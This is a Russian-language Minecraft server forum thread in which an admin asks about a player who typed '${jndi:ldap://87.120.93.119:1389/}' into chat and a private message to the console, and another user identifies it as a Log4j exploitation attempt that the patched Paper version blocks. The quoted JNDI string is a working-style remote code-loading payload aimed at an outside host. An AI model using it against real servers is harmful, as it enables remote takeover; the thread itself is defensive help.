1. Вы находитесь в сообществе Rubukkit. Мы - администраторы серверов Minecraft, разрабатываем собственные плагины и переводим на различные языки плагины наших коллег из других стран.
    Скрыть объявление
Скрыть объявление
В преддверии глобального обновления, мы проводим исследования, которые помогут нам сделать опыт пользования форумом ещё удобнее. Помогите нам, примите участие!

Обсудим Игрок пишет подозрительные команды в лс консоли

Тема в разделе "Помощь", создана пользователем ZikkyWay, 12 авг 2025.

  1. Автор темы
    ZikkyWay

    ZikkyWay Активный участник Пользователь

    Баллы:
    66
    Всем доброго дня! Недавно произошла ситуация. На мой сервер зашёл новенький игрок и начал писать в чат подозрительные команды, вот:

    В обычный чат:
    $ {jndi:ldap://87.120.93.119:1389/}

    И в лс консоли
    /tell Console $ {jndi:ldap://87.120.93.119:1389/}
    он смог написать в лс консоли, но вроде ничего не произошло. Я проверил, оказывается, игроки могли это делать, и пока разбираюсь, как это отключить...

    Я совсем не понимаю, но погуглив, нашёл, что это связано с библиотеками и тд, чтобы получить к ним доступ? Это какая-то уязвимость? Я не программист, пожалуйста, подскажите, нужно ли мне что-то предпринять? Спасиба

    Мой сервер Paper 1.21.4
    Без велосити и банжи, на одном единственном сервере (сервер панельный)
     
    ZikkyWay, 12 авг 2025
    #1
  2. RareScrap

    RareScrap Активный участник Пользователь

    Баллы:
    61
    Skype:
    live:rarescrap
    Имя в Minecraft:
    RareScrap
    Кто-то пытается эксплуатировать уязвимость Log4j для получения контроля над машиной

    На 1.21.4 либа Log4j обновлена и подобная атака бесполезна. Однако игрока-хацкера рекомендую забанить за очумелые ручки.
     
    RareScrap, 12 авг 2025
    #2
  3. Автор темы
    ZikkyWay

    ZikkyWay Активный участник Пользователь

    Баллы:
    66
    Спасибо! Буду знать
     
    ZikkyWay, 12 авг 2025
    #3

Поделиться этой страницей